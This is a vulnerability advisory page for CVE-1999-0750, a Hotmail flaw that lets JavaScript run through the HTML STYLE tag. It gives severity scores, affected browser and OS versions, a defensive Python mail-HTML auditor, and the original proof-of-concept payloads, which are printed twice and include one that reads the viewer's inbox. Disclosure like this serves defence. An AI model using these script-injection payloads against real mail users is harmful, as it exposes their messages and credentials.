CVE-1999-0750
CVSS 5.1
Published: 1999-09-13 00:00:00
Revised: 2008-09-09 08:35:19

[Original] Hotmail allows Javascript to be executed via the HTML STYLE tag, allowing remote attackers to execute commands on the user's Hotmail account.


[CNNVD] Hotmail Javascript STYLE vulnerability (CNNVD-199909-023)

        Javascript can be executed in Hotmail via the HTML STYLE tag. A remote attacker can execute commands on the user's Hotmail account.

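- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [likely to result in information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]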

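- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definition found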

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0750
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0750
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-023
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/630
(UNKNOWN)  BID  630

- Vulnerability information

Hotmail Javascript STYLE vulnerability
Medium severity  Input validation
1999-09-13 00:00:00 2005-10-20 00:00:00
Remote
        Javascript can be executed in Hotmail via the HTML STYLE tag. A remote attacker can execute commands on the user's Hotmail account.

- Advisories and patches

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (19492)

MS IE 5.0, Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability (EDBID:19492)
multiple remote
1999-09-13 Verified
0 Georgi Guninski
N/A
Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4, Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability

source: http://www.securityfocus.com/bid/630/info

The HTML STYLE command can be used to embed Javascript into Hotmail email messages. The STYLE tag circumvents current methods employed by Hotmail to disable Javascript from email messages. When viewed by a Microsoft IE 5.0 or Netscape Navigator 4.X browser, the Javascript in the email may execute various commands on the viewer's mailbox. The commands could take various actions on the user's inbox, including: reading email, deleting email, or prompting users to re-enter their password in a trojan application.


The code that must be embedded in an HTML email message is:
For IE 5.0:

<P STYLE="left:expression(eval('alert(\'JavaScript is
executed\');window.close()'))" >

For Netscape Communicator:

<STYLE TYPE="text/javascript">
alert('JavaScript is executed');
a=window.open(document.links[2]);
setTimeout('alert(\'The first message in your Inbox is from:
\'+a.document.links[26].text)',20000);
</STYLE> 		

- Vulnerability information

Hotmail Javascript STYLE Vulnerability
Input Validation Error 630
Yes No
1999-09-13 12:00:00 2009-07-11 12:56:00
This vulnerability was posted to Bugtraq by Georgi Guninski <joro@nat.bg>

- Affected software versions

Netscape Communicator 4.6
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.0
- SCO eDesktop 2.4
- SCO eServer 2.3
Netscape Communicator 4.5
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- Mandriva Linux Mandrake 6.1
- Mandriva Linux Mandrake 6.0
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.0
- SCO eDesktop 2.4
- SCO eServer 2.3
Netscape Communicator 4.0
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- Mandriva Linux Mandrake 6.1
- Mandriva Linux Mandrake 6.0
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.0
- SCO eDesktop 2.4
- SCO eServer 2.3
Microsoft Internet Explorer 5.0 for Windows NT 4
+ Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.0 for Windows 98
+ Microsoft Windows 98
Microsoft Internet Explorer 5.0 for Windows 95
+ Microsoft Windows 95
Microsoft Internet Explorer 5.0 for Windows 2000
- Microsoft Windows 2000 Professional
Microsoft Hotmail

- Discussion

The HTML STYLE command can be used to embed Javascript into Hotmail email messages. The STYLE tag circumvents current methods employed by Hotmail to disable Javascript from email messages. When viewed by a Microsoft IE 5.0 or Netscape Navigator 4.X browser, the Javascript in the email may execute various commands on the viewer's mailbox. The commands could take various actions on the user's inbox, including: reading email, deleting email, or prompting users to re-enter their password in a trojan application.
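
A defensive check for the filter gap described above, as an added example (not code from the advisory, Hotmail or SecurityFocus): it audits an HTML mail body and treats STYLE attributes and STYLE elements as script-capable, accepting only allowlisted CSS. The property allowlist, value pattern, finding labels and sample markup are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Assumed policy for this example: a short property allowlist, and values with
# no parentheses, so function-style values such as expression() never pass.
SAFE_PROPS = {"color", "background-color", "font-size", "text-align", "left"}
SAFE_VALUE = re.compile(r"[#\w\s.,%-]+")
SAMPLE = '<p style="color:#333; left:expression(1+1)">text</p>'  # constructed input

def check_declarations(css):
    """Yield findings for a CSS declaration list (inline style or rule body)."""
    for decl in filter(str.strip, css.split(";")):
        prop, sep, value = decl.partition(":")
        prop = prop.strip().lower()
        if not sep or prop not in SAFE_PROPS:
            yield "style-property-not-allowed:" + prop
        elif not SAFE_VALUE.fullmatch(value.strip()):
            yield "style-value-not-allowed:" + prop

class MailHtmlAudit(HTMLParser):
    """Flag script-capable markup in an HTML mail body, STYLE included."""
    def __init__(self):
        super().__init__()
        self.findings, self.in_css_sheet = [], False

    def handle_starttag(self, tag, attrs):
        attrs = {name: value or "" for name, value in attrs}
        if tag == "script" or any(n.startswith("on") for n in attrs):
            self.findings.append("script-or-event-handler")
        if tag == "style":
            # A sheet whose TYPE is not CSS is treated as script, not styling.
            self.in_css_sheet = attrs.get("type", "text/css").strip().lower() == "text/css"
            if not self.in_css_sheet:
                self.findings.append("style-element-non-css-type")
        self.findings += check_declarations(attrs.get("style", ""))

    def handle_endtag(self, tag):
        self.in_css_sheet = self.in_css_sheet and tag != "style"

    def handle_data(self, data):
        if self.in_css_sheet:  # inspect every rule body of a real CSS sheet
            for body in re.findall(r"\{([^}]*)\}", data):
                self.findings += check_declarations(body)

def audit(html):
    parser = MailHtmlAudit()
    parser.feed(html)
    parser.close()
    return parser.findings
```

A message with any finding would be stripped of the offending attribute or element, or rendered as plain text, before delivery to the web mailbox.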

- Exploit

From Georgi Guninski's <joro@nat.bg> post to Bugtraq:

The code that must be embedded in an HTML email message is:
For IE 5.0:

<P STYLE="left:expression(eval('alert(\'JavaScript is
executed\');window.close()'))" >

For Netscape Communicator:

<STYLE TYPE="text/javascript">
alert('JavaScript is executed');
a=window.open(document.links[2]);
setTimeout('alert(\'The first message in your Inbox is from:
\'+a.document.links[26].text)',20000);
</STYLE>

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
